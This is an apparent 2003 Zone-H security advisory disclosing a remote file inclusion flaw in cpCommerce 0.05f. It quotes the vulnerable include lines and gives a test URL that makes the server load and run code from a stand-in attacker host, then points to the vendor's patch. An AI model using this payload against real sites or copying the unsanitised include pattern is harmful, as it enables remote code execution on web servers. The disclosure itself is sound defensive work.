cpCommerce.exp.txt

`ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce  
  
Published: 19 October 2003  
Name: cpCommerce Affected Versions: 0.05f (and other versions?)  
Vendor: http://www.cpcommerce.org  
Issue: file inclusion vulnerability  
Author: Astharot (at Zone-H.org)  
  
Description  
**********  
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an  
open-source e-commerce solution that is entirely template and module based.".  
  
Details  
**********  
There's a file inclusion vulnerability in the _functions.php file, line 13-14:  
  
require_once("{$prefix}_config.php");  
require_once("{$prefix}_gateways.php");  
  
Is it possible for a remote attacker to include an external file and execute  
arbitrary commands with the privileges of the webserver (nobody by default).  
  
To test the vulnerability try this:  
  
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index  
  
In this way the file "http://www.attacker.com/index_config.php" or  
"http://www.attacker.com/index_gateways.php" will be included and executed on  
the server.  
  
Solution  
**********  
The author has been contacted and he published a temporary fix in the cpCommerce  
website forum, waiting for the new version.  
  
The patch is avaible here:  
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.  
  
Suggestions  
**********  
Fix the script with the patch proposed by the author.  
  
Link to ariginal article here:  
  
http://www.zone-h.org/en/advisories/read/id=3284/   
  
  
Astharot - Zone-H Admin  
--   
http://www.zone-h.org - [email protected]  
PGP Key: http://www.gife.org/astharot.asc  
  
Linux User #292132  
  
`